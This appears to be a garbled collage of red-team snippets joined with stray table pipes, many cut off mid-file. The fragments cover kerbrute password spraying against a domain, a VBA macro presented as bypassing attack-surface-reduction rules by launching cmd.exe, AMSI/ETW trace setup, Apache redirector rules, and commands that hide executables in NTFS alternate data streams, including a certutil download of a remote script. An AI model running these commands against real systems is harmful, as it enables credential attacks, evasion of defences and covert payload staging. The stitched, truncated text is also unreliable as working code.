With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
logman --% start dotNetTrace -p Microsoft-Windows-DotNETRuntime (JitKeyword,NGenKeyword,InteropKeyword,LoaderKeyword) win:Informational -o dotNetTrace.etl -ets | |
# Do your evil .NET thing now. In this example, I executed the Microsoft.Workflow.Compiler.exe bypass | |
# logman stop dotNetTrace -ets | |
# This is the process ID of the process I want to capture. In this case, Microsoft.Workflow.Compiler.exe | |
# I got the process ID by running a procmon trace | |
$TargetProcessId = 8256 |
# Run this elevated, reboot, boom. | |
# Feel free to name this whatever you want | |
$AutoLoggerName = 'MyAMSILogger' | |
$AutoLoggerGuid = "{$((New-Guid).Guid)}" | |
New-AutologgerConfig -Name $AutoLoggerName -Guid $AutoLoggerGuid -Start Enabled | |
Add-EtwTraceProvider -AutologgerName $AutoLoggerName -Guid '{2A576B87-09A7-520E-C21A-4942F0271D67}' -Level 0xff -MatchAnyKeyword 0x80000000000001 -Property 0x41 |
' ASR rules bypass creating child processes | |
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
Sub ASR_blocked() | |
Dim WSHShell As Object | |
Set WSHShell = CreateObject("Wscript.Shell") | |
WSHShell.Run "cmd.exe" | |
End Sub |
/* | |
================================ Compile as a .Net DLL ============================== | |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs | |
*/ | |
using System.Windows.Forms; | |
namespace TestNamespace |
# | |
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__! | |
# | |
# Note this version requires Apache 2.4+ | |
# | |
Define REDIR_TARGET |DESTINATIONURL| | |
RewriteEngine On | |
RewriteOptions Inherit | |
#!/usr/bin/python | |
# -*- coding: utf8 -*- | |
# | |
# Author: Arno0x0x, Twitter: @Arno0x0x | |
# | |
import argparse | |
from Crypto.Cipher import AES | |
import pyscrypt | |
from base64 import b64encode |
###Add content to ADS### | |
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" | |
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe | |
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe | |
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt | |
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab | |
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe | |
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg | |
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey | |
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat |
#!/usr/bin/env python | |
import sys | |
if __name__ == "__main__": | |
if len(sys.argv) < 2: | |
print "usage: %s file.bin\n" % (sys.argv[0],) | |
sys.exit(0) | |
shellcode = "\"" | |
ctr = 1 | |
maxlen = 15 |
using System; | |
using System.Net; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module: